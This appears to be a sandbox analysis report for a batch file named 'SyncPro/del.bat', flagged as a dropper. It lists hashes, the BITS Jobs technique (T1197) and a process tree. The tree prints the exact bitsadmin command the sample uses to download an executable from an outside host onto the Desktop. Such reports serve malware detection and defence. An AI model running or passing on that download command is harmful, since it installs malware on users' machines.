6c2e4c5e15176147ab9580ad7f7776b7445e495da651e0aba4e7e4b666b6e6be

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
16-08-2024 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SyncPro/del.bat
Size

571B
MD5

473762ec88f40cfcdb0c025dc0e2779d
SHA1

2fb8290fb424b59f415bff3d85e048a460dff0cf
SHA256

cd6a134558877718cccc6312b69de40739e98de523d8d0fd73bd979ddd45fd71
SHA512

dbbe9d4df2f19905e46fe9b9799a9737f7853ae28d44959c4b9e184a67c9e0903f443e481b8075494a6221968c710945c35c123929c8752432bce08a0a58c4dd

Score

8^/10

dropper

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
668	bitsadmin.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 984 wrote to memory of 668	984	cmd.exe	82
PID 984 wrote to memory of 668	984	cmd.exe	82

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SyncPro\del.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:984
- C:\Windows\system32\bitsadmin.exe
  bitsadmin /transfer myDownloadJob /download /priority foreground "https://reds-owns.full-stack.dev/gd0U2" "C:\Users\Admin\Desktop\downloaded_file.exe"
  2⤵
  - Download via BitsAdmin
  PID:668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads